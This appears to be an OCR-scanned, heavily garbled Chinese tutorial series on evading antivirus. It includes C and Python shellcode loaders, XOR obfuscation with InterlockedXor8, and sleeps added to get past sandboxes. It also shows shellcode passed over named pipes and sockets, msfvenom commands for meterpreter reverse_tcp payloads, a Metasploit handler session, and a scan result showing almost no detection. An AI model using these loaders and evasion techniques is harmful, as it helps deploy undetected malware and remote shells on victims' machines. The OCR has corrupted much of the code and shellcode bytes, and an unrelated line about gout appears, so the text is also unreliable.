NULL, 
shellcode size, 
MEM COMMIT, 
PAGE READWRITE // 只 申请 可 读 可 写 
); 


// 将 shellcode 复 制 到 可 读 可 写 的 内 存 页 中 
CopyMemory(shellcode, buf, shellcode_size); 


// 这 里 开始 更 改 它 的 属性 为 可 执行 
VirtualProtect(shellcode,shellcode size,PAGE EXECUTE, &dwOldProtect); 


// 等 待 几 秒 ， 兴 许可 以 跳 过 某 些 沙 盒 呢 ? 
Sleep(2000); 


hThread = CreateThread( 
NULL, // 安全 描述 符 
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NULL, // 栈 的 大 小 
(LPTHREAD START ROUTINE)shellcode, // 函数 ” 
NULL, // 参数 

NULL, // 线程 标志 

&dwThreadId // 线程 ID 

); 


WaitForSingleObject(hThread,INFINITE); // 一 直 等 待 线程 执行 结束 
return 0; 


) 


0x02 异 或 方式 


通常 ， 我 们 使 用 循环 去 进行 异 或 运算 ， 会 使 用 到 异 或 运算 符 ， 这 里 是 较为 敏感 的 操作 ， 那 么 ， 
Windows 下 是 否 有 相应 的 API 呢 ? 


我 在 学 习 《Windows 核 心 编程 》 的 过 程 中 ， 发 现 InteriockedXorRelease 函 数 可 以 用 于 两 个 值 的 异 或 
运算 ， 最 重要 的 一 点 就 是 ， 它 的 操作 是 原子 的 ， 也 就 是 可 以 达到 线程 同步 。 


抱 着 这 个 心态 ， 我 决定 实验 一 下 : 
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de «Windows.h» 
lude «intrin.h» 
clude <WinBase.h> 
сінде <stdio.h> 
口 函 数 

wmain(int argc,TCHAR * argv[]){ 

int shellcode size = 0; // shellcode 长 度 
= DWORD dwThreadId; // 线程 ID 

= HANDLE hThread; // 线程 句柄 

” DWORD dwOldProtect; // 内 存 页 属性 

/* length: 800 bytes */ 


D i 












77 获取 shellcode 大 小 
ellcode size = sizeof(buf); 


增加 异 或 代码 */ 

(int i = 0;і<ѕһе11сойе size; i++){ 
Sleep(59); 
—InterlockedXor8(buf-i,10); 


rtualAlloc( 

NULL, // X3 

800, // 大 小 

MEM COMMIT, // 内 存 页 状态 

PAGE EXECUTE READWRITE // 可 读 可 写 可 执行 
) ; 


char * shellcode = (char *)VirtualAlloc( 
NULL, 

shellcode size, 

MEM COMMIT, 

PAGE READWRITE // 只 申请 可 读 可 写 

); 


E // 将 shellcode 复 制 到 可 读 可 写 的 内 存 页 中 
"n CopyMemory (shellcode,buf,shellcode size); 


© // 这 里 开始 更 改 它 的 属性 为 可 执行 


/等 待 几 秒 ， 兴 许可 以 跳 过 某 些 沙 盒 呢 ? 
a Sleep(2000); 
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_ VirtualProtect(shellcode, shellcode size,PAGE EXECUTE, &dwOldProtect); 
е 


hThread = CreateThread( ) » 
NULL, // 安全 描述 符 
NULL, // 栈 的 大 小 
(LPTHREAD START ROUTINE)shellcode, // 函数 
NULL, // 参数 
NULL, // 线程 标志 
&dwThreadId // 线程 ID 
Jir 


WaitForSingleObject(hThread, INFINITE); // 一 直 等 待 线程 执行 结束 
return 0; 
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静态 恶意 代码 逃逸 (第 四 课 ) 
0x01 分 离 免 杀 


前 五 课 的 代码 将 会 上 传 至 投稿 平台 ， 免 费 下 载 研究 
分 离 免 杀 : 将 恶意 代码 放置 在 程序 本 身 之 外 的 一 种 加 载 方式 。 
前 面 三 课 主 要 围绕 着 程序 本 身 的 加 载 ， 后 面 的 课程 将 围绕 网 络 、 数 据 共享 的 方式 去 展开 


0x02 管道 


MABE: 管道 是 通过 网 络 来 完成 进程 间 的 通信 ， 它 屏蔽 了 底层 的 网 络 协议 细节 。 


通常 与 Pipe 相 关 的 API 都 与 管道 有 关 ， 包 括 Cobaltstrike External C2 也 是 用 的 管道 进行 进程 通信 
般 管道 是 一 个 公开 的 内 核对 象 ， 所 有 进程 都 可 以 访问 。 


先 展开 本 地 管道 来 讲解 : 
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#include «Windows.h» қ 
#include <stdio.h> 
#include <intrin.h> 


#define BUFF_SIZE 1024 
char buf[] = "\xf6\xe2\x83\x0a\xOa\xOa\x6a\x83\ xef Nx3bVxd8Nx6eNx81Nx58NXx3aNX81 
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest"); 


BOOL RecvShellcode( VOID) { 
HANDLE hPipeClient; 
DWORD dwwritten; 
DWORD dwShellcodeSize = sizeof(buf); 
// 等 待 管道 可 用 
WaitNamedPipe(ptsPipeName,NMPWAIT WAIT FOREVER); 
// 连接 管道 
hPipeClient = CreateFile(ptsPipeName,GENERIC WRITE,FILE SHARE READ, NULL, OPEN 


if(hPipeClient == INVALID HANDLE VALUE) { 
printf("[+]Can't Open Pipe , Error : %d \n",GetLastError()); 
return FALSE; 


WriteFile(hPipeClient, buf, dwShellcodeSize, &dwwritten, NULL); 
if(dwwritten == dwShellcodeSize) { 
CloseHandle(hPipeClient); 
printf("[+]Send Success ! Shellcode : %d Bytes\n",dwShellcodeSize) ; 
return TRUE; 
} 
CloseHandle(hPipeClient); 
return FALSE; 


int wmain(int argc, TCHAR * argv[]){ 


HANDLE hPipe; 
DWORD dwError; 
CHAR szBuffer[BUFF. SIZE]; 
DWORD dwLen; 
PCHAR pszShellcode - NULL; 
DWORD dwOldProtect; // 内 存 页 属性 
HANDLE hThread; 
DWORD dwThreadId; 
// 参考 : https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbas 
hPipe - CreateNamedPipe( 
ptsPipeName, 
PIPE ACCESS INBOUND, 
PIPE TYPE BYTE| PIPE WAIT, 
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Pipe == INVALID HANDLE VALUE)( 

X dwError = GetLastError(); 

printf("[-]Create Pipe Error : %d \n",dwError); 
| return dwError; 





f(ConnectNamedPipe(hPipe,NULL) > 0)( 
| printf("[*]Client Connected...\n"); 
= ReadFile(hPipe,szBuffer,BUFF SIZE, &dwLen, NULL); 
printf("[*]Get DATA Length : %d \n",dwLen); 
// 申请 内 存 页 
pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen, MEM COMMIT,PAGE READWRITE) 
// 拷贝 内 存 
CopyMemory(pszShellcode, szBuffer, dwLen); 


тем 


for(DWORD i = 0;i« dwLen; i++){ 
Sleep(50); 
.InterlockedXor8(pszShellcode-*i, 10); 


// 这 里 开始 更 改 它 的 属性 为 可 执行 
VirtualProtect(pszShellcode,dwLen,PAGE EXECUTE, &dwOldProtect); 
// 执行 Shellcode 
hThread = CreateThread( 
NULL, // 安全 描述 符 
NULL, // 栈 的 大 小 
(LPTHREAD START ROUTINE)pszShellcode, // 函数 
NULL, // 参数 
NULL, // 线程 标志 
&dwThreadId // 线程 ID 
); 


WaitForSingleObject(hThread, INFINITE); 


return 0; 
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本 实例 主要 是 通过 一 个 线程 函数 充当 一 个 管道 客户 端 ， 使 用 管道 客户 端 连接 管道 ， 发 送 Shellcode， 
然后 由 管道 服务 端 接收 ， 并 反 混淆 ， 运 行 木马 线程 。 


Cobait Strike View Attacks Reporting Help 
пос ӛсе BLP Feb Ра ве 
external ternal 





V 站 结果 : 
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静态 恶意 代码 逃逸 (SAR) 
0x01 真正 意义 上 的 分 离 


前 五 课 的 代码 将 会 上 传 至 投稿 平台 ， 免 费 下 载 研究 
将 目 一 课 的 代码 分 离开 编译 ， 然 后 通过 管道 传输 ， 让 进程 通信 。 


соон Өлке View Attacks Reporting Hep 
ооп mase st AD os DC” fa ae 
[externa тетә ~ 








BadCodeWithPipe 
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#include <Windows.h> 4 ” ? 
#include <stdio.h> 
#include <intrin.h> 


#define BUFF_SIZE 1024 
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest"); 
int wmain(int argc, TCHAR * argv[]){ 


HANDLE hPipe; 
DWORD dwError; 
CHAR szBuffer[BUFF_SIZE]; 
DWORD dwLen; 
PCHAR pszShellcode = NULL; 
DWORD dwOldProtect; // 内 存 页 属性 
HANDLE hThread; 
DWORD dwThreadId; 
// ЖЖ: https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf -winbas 
hPipe - CreateNamedPipe( 
ptsPipeName, 
PIPE ACCESS INBOUND, 
PIPE TYPE BYTE| PIPE WAIT, 
PIPE UNLIMITED INSTANCES, 
BUFF. SIZE, 
BUFF SIZE, 
9, 
NULL) ; 


if(hPipe == INVALID HANDLE VALUE)( 
dwError = GetLastError(); 
printf("[-]Create Pipe Error : %d \n",dwError); 
return dwError; 


if(ConnectNamedPipe(hPipe,NULL) > 0) 
printf("[*]Client Connected...\n"); 
ReadFile(hPipe,szBuffer,BUFF SIZE, &dwLen, NULL); 
printf("[*]Get DATA Length : %d ^n",dwLen); 
// 申请 内 存 页 
pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen,MEM COMMIT,PAGE READWRITE) 
// 拷贝 内 存 
CopyMemory(pszShellcode,szBuffer,dwLen); 


for(DWORD i = 0;i« dwLen; i**)( 


Sleep(50); 
 InterlockedXor8(pszShellcode-i, 10); 
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0/4 这 里 开始 更 改 它 的 属性 为 可 执行 ee > 
: VirtualProtect(pszShellcode,dwLen,PAGE EXECUTE, &dwOldProtect); 
// 执行 Shellcode 
hThread = CreateThread( 

NULL, // 安全 描述 符 

NULL, // 栈 的 大 小 

(LPTHREAD START ROUTINE)pszShellcode, // ЖЖ 

NULL, // 参数 

NULL, // 线程 标志 

&dwThreadId // 线程 ID 


JP 


WaitForSingleObject(hThread, INFINITE); 


С odePipeClient 
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&include «Windows,h» 
#include <stdio.h> 
#include <intrin.h> 


#define BUFF_SIZE 1024 
char buf[] = "\xf6\xe2\x83\x0a\x0a\xOa\x6a\x83\xef\x3bD\xd8\x6e\xX81\x58\x3a\x81\x 
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest"); 


BOOL RecvShellcode(VOID){ 
HANDLE hPipeClient; 
DWORD dwWritten; 
DWORD dwShellcodeSize - sizeof(buf); 
// 等 待 管道 可 用 
WaitNamedPipe(ptsPipeName,NMPWAIT WAIT FOREVER); 
// 连接 管道 
hPipeClient = CreateFile(ptsPipeName,GENERIC WRITE,FILE SHARE READ, NULL, OPEN 


if(hPipeClient -- INVALID HANDLE VALUE)( 
printf("[+]Can't Open Pipe , Error : %d \n",GetLastError()); 
return FALSE; 


WriteFile(hPipeClient, buf, dwShellcodeSize, &dwwritten, NULL); 
if(dwwritten == dwShellcodeSize) { 
CloseHandle(hPipeClient) ; 
printf("[+}Send Success ! Shellcode : %d Bytes\n", dwShellcodeSize) ; 
return TRUE; 


у 
CloseHandle(hPipeClient); 
return FALSE; 


int wmain(int argc, TCHAR * argv[]){ 
RecvShellcode(); 


return 0; 


0x02 网 络 套 接 字 (SOCKET) 
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[senes x 


Test 


通过 建立 一 个 客户 端 和 服 
服务 端 





进行 Shellcode 的 收发 ， 类 似 于 Java 中 的 反 序列 化 。 
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#include «WinSock2.h» 
#include «Windows.h» 
#include <stdio.h> 
#include <intrin.h> 


#pragma comment(lib,"ws2 32.11р") 


BOOL RunCode(CHAR * code,DWORD dwCodeLen) 
1 
HANDLE hThread; 
DWORD dwOldProtect; 
DWORD dwThreadId; 
PCHAR pszShellcode = (PCHAR)VirtualAlloc(NULL, dwCodeLen, MEM COMMIT,PAGE REAL 
CopyMemory (pszShellcode,code,dwCodeLen); 


for(DWORD i = 0;i« dwCodeLen; 1++){ 
 InterlockedXor8(pszShellcode-*i, 10); 
H 
// 这 里 开始 更 改 它 的 属性 为 可 执行 
VirtualProtect(pszShellcode, dwCodeLen, PAGE_EXECUTE, &dwOldProtect); 
// 执行 Shellcode 
hThread = CreateThread( 
NULL, // 安全 描述 符 
NULL, // 栈 的 大 小 
(LPTHREAD START ROUTINE)pszShellcode, // 函数 
NULL, // 参数 
NULL, // 线程 标志 
&dwThreadid // 线程 ID 
); 
WaitForSingleObject(hThread, INFINITE); 
return TRUE; 


int wmain(int argc, TCHAR argv[]){ 
CHAR buf[801]; 
DWORD dwError; 
WORD sockVersion - MAKEWORD(2, 2); 
WSADATA wsaData; 
SOCKET socks; 
SOCKET sClient; 
struct sockaddr in s client; 
INT nAddrLen - sizeof(s client); 
SHORT sListenPort - 8888; 
struct sockaddr in sin; 


if (WSAStartup(sockVersion, &wsaData) !- 0) 


t 


dwError - GetLastError(); 
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printf("[*]WSAStarup Error : %d Ха", dwError); 
return dwError; i » à 


socks = socket(AF INET, SOCK STREAM, IPPROTO TCP); 


С if (socks == INVALID SOCKET) 

P. 

dwError = GetLastError(); 
printf("[*]Socket Error : %d ^n",dwError); 
return dwError; 


sin.sin family - AF INET; 
sin.sin port - htons(sListenPort); 
sin.sin addr.S un.S addr - INADDR ANY; 


if(bind(socks,(struct sockaddr *)&sin,sizeof(sin)) -- SOCKET ERROR ) 
t 

dwError - GetLastError(); 

printf("[*]Bind Error : %d An" dwError); 

return dwError; 


if (listen(socks, 5) -- SOCKET ERROR) 

( 
dwError = GetLastError(); 
prantt("[*]tPisten Error ! %d Nn", dwError); 
return dwError; 


sClient = accept(socks, (SOCKADDR *)&s client, &nAddrLen); 
int ret recv(sClient,buf,sizeof(buf),0); 

if (ret » 0) 

t 


printf("[+]Recv %d-Bytes \n",ret); 
closesocket(sClient) ; 
closesocket (socks); 


WSACleanup( ); 
RunCode(buf, sizeof (buf) ); 
return 0; 
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je «WinSock2.h» — н — M 
<Windows . h> 

<stdio.h> 

<intrin.h> 


a comment(lib,"ws2 32.lib") 
f[] = "Nxf6Nxe2Nx83Nx0aNx0aNx0aNx6aNx83NxefNx3bNxd8Nx6eNx81Nx58Nx3aNx81Nx 


lain(int argc, TCHAR argv[])( 

RD dwError; 

sockVersion = MAKEWORD(2, 2); 
DATA wsaData; 

T socks; 

RT sListenPort = 8888; 

uct sockaddr in sin; 


` (WSAStartup(sockVersion, &wsaData) !- 0) 


dwError - GetLastError(); 
printf("[*]WSAStarup Error : %d \n", dwError); 
return dwError; 


ocks = socket(AF INET, SOCK STREAM, IPPROTO TCP); 
if (socks -- INVALID SOCKET) 


dwError = GetLastError(); 
printf("[*]Socket Error : %d \n",dwError); 
return dwError; 


in.sin family - AF INET; 
JA Sin.sin port = htons(sListenPort); 
JJ Sin.sin addr.S un.S addr = inet addr("192.168.170.1"); 


if(connect(socks,(struct sockaddr *)&sin,sizeof(sin)) -- SOCKET ERROR ) 
( 

dwError = GetLastError(); 

printf("[*]Bind Error : %d Nn",dwError); 

return dwError; 


} 

int ret = send(socks, buf, sizeof (buf),0); 
if (ret > 0) 

T 


printf("[+]Send %d-Bytes Nn" ret) 
closesocket (socks); 
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} 





ive ке» 
< die sl ™ у 
WSACleanup(); 
return 0; 
} 
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第 五 课 、 第 六 课 将 会 实现 Shellcode 加 载 器 从 零 到 一 。 
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基于 Python 内 存 加 载 shellcode 第 二 季 
生成 


首先 生成 一 个 测试 的 msf shellcode 


msfvenom -p windows/x64/ CMD-calc.exe -f python 


:~# msfvenom -p windows/x64/exec CMD=calc.exe -f python 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the paytoad 
[-] No arch selected, selecting arch: x64 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 276 bytes 
Final size of python file: 1357 bytes 
-T 
"“\хїс\х48\х83\хе4\хї@\хеВ\хс@\х®@\х@@\х@0@\х41\х51\х41" 
“AxX50NX52NAX51NX56NX48NAx31NXd2NAX65Nx48Nx8bNx52NX60Nx48" 
"\x8byx52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f”" 
"\xb7\xda\x4a\x4d\x31\xc9\x48\x31\xcO\xac\x3c\x61\x7c” 
"\xO2\x2c\x2ZO\x41\xci\xcO\xOd\ x41\x@1\xci\xe2\xed\x52" 
"\xX41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x91\xdO\x8b" 
b"Nx80NxX88NxX00NxX00NX00NX48NX85NXxc0Nx74Nx67Nx48Nx01Nxd0" 
b"Nx50NxX8bNx48Nx18NX44NX8bNx408XX20Nx49NX01NxXd0Nxe3Nx56" 
b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x@1\xd6\x4d\x31\xc9" 
= b"\x48\x31\xc@\xac\x41\xc1i\xc9\x@d\x41\x81\xc1\x38\xe®@" 
= b"\x75\xf1i\x4c\x@3\x4c\x24\x@8\x45\x39\xd1i\x75\xd8\x58" 
b"\x44\x8b\x40\x24\x49\xO1\xdO\x66\x41\x8b\xOc\x48\x44" 
= b"Xx8bNx40Nx1cNx49Ax01Nxd0Nx41Nx8bNx04Nx88Nx48Nx01Nxd0" 
= b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\xX41\x59\x41\x5a" 
b"\x48\x83\xec\x28\x41\x52\xff\xe@\x58\x41\x59\x5a\x48" 
b"\x8b\x12\xe9\x57\xff\xff\xff\xSd\x48\xba\x@1\x@8\x89" 
b"XAx80N x00 x00 x00 x98 x48Nx8dVx8d X x01XNx01N x80 x08X x41" 
= b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xfO\xb5\xa2\x56\x41" 
b"\xba\xa6\x95\xbd\x9d\xf f\xd5\x48\x83\xc4\x28\x3c\x06" 
b"\x7c\x@a\x80\xfb\xe0\x75\x@5\xbb\x47\x13\x72\x6f\x6a" 
= b"\x@@\x59\x41\x89\xda\xf f\xd5\x63\x61\x6cC\x63\x2e\x65" 
b"\x78\x65\x00" 





把 其 中 的 shellcode 复 制 出 来 留待 待 会 使 用 


原理 


大 部 分 脚本 语言 加 载 shellcode 其 实 都 是 通过 c 的 rfi 去 调用 操作 系统 的 apj， 其 实 并 没有 太 多 
的 技巧 在 里 面 ， 明 白 了 原理 ， 只 需要 查 一 下 对 应 的 脚本 语言 怎么 调用 с 即 可 。 








if 





那么 我 们 只 需要 明白 c 通常 是 怎么 加 载 shellcode 的 即 可 一 通 百 通 。 











那么 c 是 怎么 加 载 shellcode 呢 ， 我 们 直接 从 汇编 开始 探究 。 
文 





Shellcode 这 个 东西 我 们 明白 是 一 串 可 执行 的 二 进 制 一般 可 执行 文件 的 拥有 可 执行 权限 的 
Section 为 text) ， 那 么 我 们 先 通过 其 他 的 手段 开辟 一 片 拥有 可 读 可 写 可 执行 权限 的 区 域 放 入 我 们 的 


ет. 


Shellcode ， 然 后 跳 转 到 shellcode 首 地 址 去 执行 就 行 了 ， 汇编 里 面 改 变 eip ( 即 当 前 指令 的 




















下 一 条 即将 运行 指令 的 虚拟 地 址 ) 的 方法 有 不 少 ,最 简单 的 就 是 直接 jmp 过 去 了 。 也 就 是 写成 
DARRERE анале) 


lea eax, shellcode; 
jmp eax; 


那么 我 们 用 c 怎么 表示 呢 ? 我 这 里 也 写 一 段 伪 码 (因为 本 文 的 重点 并 不 是 在 于 с 代码 的 编写 ) 
那么 按照 刚才 的 思路 ， 先 申请 一 块 可 执行 的 内 存 ， 放 入 shellcode 然后 跳 转 过 去 执行 即 可 。 


unsigned char shellcode[] = 
"Nxd9NxebNx9bNxd9Nx 74Nx24NXTANX815Xxd2Nxb2NXx72NX81NXc9" 
"UNXGANX8DNX71NX30NX8D0NX76NXOC NX8bNX76NX1C6 NX8bNX46NXx08" 
0Yx8bNx7eNx20Nx8bNx36Nx38Nx4fNx18Nx75NxTf3Nx59Nx01Nxd1" 
4) 

typedef void ( stdcall *CODE) (); 

PVOID p = NULL; 

р- ТТ s sizeof(shellcode), MEM COMMIT | MEM RESERVE, PAGE EXECUTE 

^ d:8shellcode?A Ар 


py (n, Ыс, sizeof (shellcode)); 
CODE code =(CODE)p; 


code( ); 


我 并 没有 写 出 一 个 可 用 的 c ШЕ) shellcode ， 只 是 旨 在 点 出 一 下 流程 ， 然 后 引出 后 面 的 
python 加 载 shellcode ， 上 面 我 们 先 申 请 了 一 块 带 有 可 读 可 写 可 执行 权限 的 内 存 ， 然 后 把 
shellcode 放 进 去 ， 然 后 我 们 强 转 为 一 个 函数 类 型 指针 ， 最 后 调用 这 个 函数 ， 达 到 了 我 们 的 目 
的 。 


Python 实现 


前 面 我 说 过 ， 大 部 分 脚本 语言 加 载 shellcode 都 是 调用 的 c 的 伯 ， 那 么 我 们 直接 按照 之 前 的 思路 
来 就 行 了 。 下 面 我 直接 贴 代码 
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ире 







































t ctypes [Sd Р “лек,” 


= Bu 

+= D'AXTCNXABNX83NXxeANXx f ONxe8NxcONXO0NXOONXOONXA41NXx51 Vx 41" 
+= b'NXx50Nx52NX51NX56Nx48Nx 31 Vxd2Nx65NX48NXX8DNX52NX60NX48" 
+= D'NXBbNX52NX18NX48NX8DNXx52NX20NXABNX8DNX72NXx850NX48NX0f " 
+= b"Nxb7Nx4aVx4aNx4AdNx31Nxc9Nx48NXx31NxcONXxac Nx36 NX61Nx76 " 
+= b"AXO2NX2CNX20Nx A1 Nx c 1NXc9NxOodNx41Nx01Nxc1Nxe2NxedNx52" 
+= b"Xx41Nx51NXA8NX8bNX52NXx20NX8bDNx42NX3c NXx48NXx01NXxdO Nx8b " 
+= b'NXx80XXx8B8NXOONX00NXOO0NXA8NX85NXcONX74Nx67NX48Nx01Nxd9" 
t= b'NXx50NX8bNXA8NX18NXx44NXBDNXAONX20NX49NX01NXdOVxe3Nx56 " 
+= b"NX48NxffNxc9Nx41Nx8bNx34Nx88Nx48Nx01Nxd6Nx4dNx31Nxc9" 
+= Db"UNX48NX31NxXC0NSXaCNX41NXC1NXC9NX0dNX41NXx01NXC1NX38NXxe0!' 
+= b"Nx75NxT1NX4CNX03NX4CNX24NX08NX45NX39Nxd1NX75NXxd8Nx58" 
+= b"Nx44Nx8bNXx40NXx24Xx4A9NXx01NxdONXx66Nx41Nx8bNx9CcNx48Nx44" 
+= D"NX8DNXx40NX1CNX49NxX01NXd0NX41NX8bNX04NX88NX48NX01Nx0d0" 
+= b"NXx41NX58NX41NX58NX5eNx59Nx5aNx41NXx58NxX41Nx59Nx41Nx5a" 
+= b"\x48\x83\xec\x20\x41\x52\xff\xeO\x58\x41\x59\x5a\x48" 
+= b"Nx8bNx12Nxe9Nx57NxffNxffNxffNx5dNx48NxbaNx01Nx00Nx00" 
+= D"UNx00NX00Nx00Nx00Nx00NXx48Nx8dNx8dNx01NX01NxX00Nx00Nx41" 
+= b"NxbaNx31Nx8bNx6fNx87NxffNxd5NxbbNxf@0Nxb5NXxa2Nx56Nx41" 
+= b'"NxbaNxa6Nx95NxbdNx9dNxf fNXd5NXABNX83NXCANX28NX8CcNX06" 
+= b'Nx76NX0aNX80NXfDNXxeONx75Nx05XxbbNx47NX13Nx 72Nx6fT Nx6a" 
+= b"'Xx00Nx59Nx413x89VxdaXxf f xd5Nx63NX61NX66c x63 X 2eNx65" 
+= b"Nx78Nx65Nx00" 


code = bytearray(shellcode) 

IVirtualAllocE[SIAE Actypes.c_uint64 

pes.windll.kernel32.VirtualAlloc.restype = ctypes.c uint64 
内 存 


= ctypes.windll.kernel32.VirtualAlloc(ctypes.c int(^), ctypes.c int(len(shel 





shellcode 
= (ctypes.c char * len(shellcode)).from buffer(shellcode) 
9es. windll.kernel32.RtlMoveMemory( 
ctypes.c_uint64(ptr), 
. buf, 
U cCtypes.c int(len(shellcode)) 





和 到 建 二 个 线程 从 shellcode 防 止 位 置 首 地 | 81413 
indle = ctypes.windll.kernel32.CreateThread( 
сЕурев.с int(?), 

ctypes.c int(98), 

ctypes.c_uint64(ptr), 

Cctypes.c іпі(0), 

Ctypes.c int(9), 
ctypes.pointer(ctypes.c int(?)) 


араа 
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ctypes.windll.kernel32.WaitForSingleObject(ctypes.c int(handle),ctypes.c int(.:) 


注意 其 中 的 的 每 个 c uinte4 ， 这 个 类 型 在 64 位 上 是 必要 的 ， 我 们 需要 手动 指定 argtypes 和 
restype ， 否 则 默认 的 是 32 位 整 型 。 

我 的 代码 里 面 加 了 注释 ， 我 们 可 以 看 到 ， 基 本 思路 也 是 一 样 的 ， 先 分 配 一 块 可 读 可 写 可 执行 代码 的 
内 存 ， 在 代码 中 ， 我 使 用 的 是 0x40 (PAGE EXECUTE READWRITE) 和 0x3000 ( 0х1000 | 
0х2000)(МЕМ СОММІТ | MEM_RESERVE)， 然 后 把 shellcode 塞 进去 ， 跳 过 去 运行 。 


计算 器 


PS C:\Users\Akkuman\Desktop> И = 标准 uw 
PS C:\Users\Akkuman\Desktop> 





M M- MS 
% СЕ € @ 
УХ 7 8 9 
4 5 6 


相信 通过 这 一 片 文章 的 讲解 你 能 够 对 shellcode 的 本 质 有 更 多 的 了 解 。 
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payload 分 离 免 杀 思 路 


0x00: 以 msf 为 例 : 监听 端口 


handler 
la ) > set payload windows/meterpreter/reverse tcp 
s/meterpreter/rever 
Í > set lport 8 
shaw options 


le options (exploit /multi ‘hand! 


urrent Setting Required 


ad options (windows 


yame 


thread, proce none) 


Exploit target 


Id Name 


O wildcard Target 


Lhost 192.1 
r) > exploit -z 


М Started reverse TCP handler on 192.168. 





0x001: shellcode 


msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=8080 -e 
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0x002 加 载 器 


> Wsers Wohnn Desktop\she licode_launcher—-master>she llcode_launcher.exe -i test. 


Starting up 
alling file now. Loaded binary at: @x@@2b40G0 





ñ 


Google Mozilla ОО 8 Һао123 
Chrome Firefox 览 






常规 | 安全 | 详细 信息 | 以 前 的 版 本 | 


[5 fest. c 


文件 类 型 C Source L.c) 


打开 方式 : Microsoft Visual Si Жр (С). 













ë 
е a 








dee PI. "тик ГЕ ж 1m. ВА нд, ГИГ 

Dani сози ауа eS CUP CS ELVES incher 
c A М с ne 

Xd 416 字 节 (476 xD) 








占用 空间 : 


4.00 KB (4,096 ZZ) 
创建 时 间 : 2018129209, 23:3 


修改 时 间 2018 年 12 月 20 日 ，23:39:34 
访问 时 间 : ”2018 年 12 月 20 日 ，23:39 















м; 


R Ф). 


ajot 


И 






属性 : [ ста) [^ 隐藏 00 


安全 : 文件 来 自 其 他 计算 机 ， 可 能 
E o om 


1 $ ^Y) SE A 4] 
калалық. AWEN 

















1 J s 
ы . 
zs — wm 5 m 9 sm 
қ уи puit ық Lufthans 
келе. wo PERGAM E) a 


扫描 结果 





1600 


One engine detected this file 








ClamAV š Ad Aware 
AegisLab AhnLab-V3 
ALYac Antiy-AVI 
Arcabit Avast 
Avast Mobile Security AVG 

Avira Babable 
Baidu BitDefender 
Bkav CAT-Quic 
CMC comodo 
Cyren DrWeb 
Emsisoft eScan 
ESET-NOD32 F-Prot 
F-Secure Fortinet 


handler on 192.16 
) to 192.16 
Sleeping before handling stage... 


Meterpreter 5 ion l opened (192.16 
l created in the background. 
loit(culti:handler) > 0 





. 


结石 ， 通 风 等 。 痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 










Debian 
68.1.4 Windows 7 
.168.1.119 Windows 2003 


= windows/meterpreter/reverse_tcp 


ploit(multi/handler) » show options 
Г 


° options (exploit/multi/handler): 


r SI 


Current Setting Required Description 
oad options (windows/meterpreter/reverse tcp): 


Current Setting Required Description 


yes Exit technique (Accepted: '', seh, three 
192.168.1.5 yes The listen address (an interface may be 
yes The listen port 
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exploit dier) » w options 


Madule options (exploit/multi/handler) 


Name Current Setting Required D ription 


none) 
С у The еп address 
LPORT 53 yes The listen port 
Exploit target 


Id Мате 


O Wildcard Target 


msf exploit(rulti handler) > exploit 


[^] Started reverse TCP handler on 192.168.1.5; 





payload 生 成 : 


root@John:/tmp# msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.1.5 LF 


rootQJohn:/tmp£ du -sb First.exe 
73802 First.exe 


第 一 次 优化 payload 
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iS No arch selected, selecting arch: x86 from the payload 
Found 11 compatible encoders 


6/shikata ga nai succeeded with size 368 (iteration=0) 
6/shikata_ga_nai chosen with final size 368 

yload size: 368 bytes 

inal size of c file: 1571 bytes 

unsigned char buf[] = 

_ "\xd9\xe3\xba\xal\x43\xe5\x72\xd9\x74\x24\xF4\x5d\x29\xe9\xb1" 
"\x56\x31\x55\x18\x03\x55\x18\x83\xc5\xa5\xa1\x10\xBe\x4d\xa7" 
x "\xdb\x6f\x8d\xc8\x52\x8a\xbce\xc8\x01\xde\xee\xf8\x42\xb2\x02" 
—"\xX72\xO6\xX27\x91\ xf 6\x8F\x48\x12\xbo\xe9\x67\xa3\xed\xca\xe6" 
| #\x27\xec\xLe\xc9\x16\x3F\x53\x08\x5F\x22\x9e\x58\x08\x28\x0d" 
~ "\x4d\x3d\x64\x8e\xe6\x0d\x68\x96\x1b\xc5\x8b\xb7\x8d\x5e\xd2" 
—"\X17\x2F\xb3\x6e\x1e\x37\xd0\x4b\xe8\xco\x22\x27\xeb\x04\x7b" 
~ Mxc8\x40\x69\xb4\x3b\x98\xad\x72\xa4\xef \xe7\x81\x59\xe8\x13" 
E "\xf8\x85\x7d\x80\x5a\x4d\x25\x6c\x5b\x82\xbO\xe7\x57\x6F\xb6" 
—"\xa0\x7b\x6e\x1b\xdb\x87\xfb\x9a\x0c\xOe\xbf\xb8\x88\x4b\x1b" 
"\xaO\x89\x31\xca\xdd\xca\x9a\xb3\x7b\x80\x36\xa7\xf1\xcb\x5e" 
S "\xXO4\x38\xf4\x9e\x02\x4b\x87\xac\x8d\xe7\xOF\x9C\xX46\x2e\xd7" 
| "NX98 941 Xd 1NX07 cd NXG1NX2 f xa xd Vx9b VF x fe NX Gd x23 vdd" 
71 "\x7C\xc6\xb3\xe2\xa8\x72\xbe\x74\x93\x2a\xbf\x81\x7b\x28\xco” 
% "\X89\x4e\xa5\x26\xd9\xe0\xe5\xf6\x9a\x50\x45\xa7\x72\xbb\x4a" 
"\X98\x63\xC4\x81\xb1\x0e\x2b\x7f\xe9\xa6\xd2\xda\x61\x56\x1a" 
_ U"NXf1NXOf NX58NX90 NX f 3NXf0Nx17NX51Nx76NXe3NX40NX06NX 78NX f bx 90" 
_ "NXa3Nx78NX91NX94NX65NX2 f NXOdNX97NX59NX07NX92NX68NXb 7ZVXLANX dS" 
: "\x97\x46\x2c\xad\xae\xde\x10\xd9\xce\x30\x90\x19\x99\x5a\x90" 
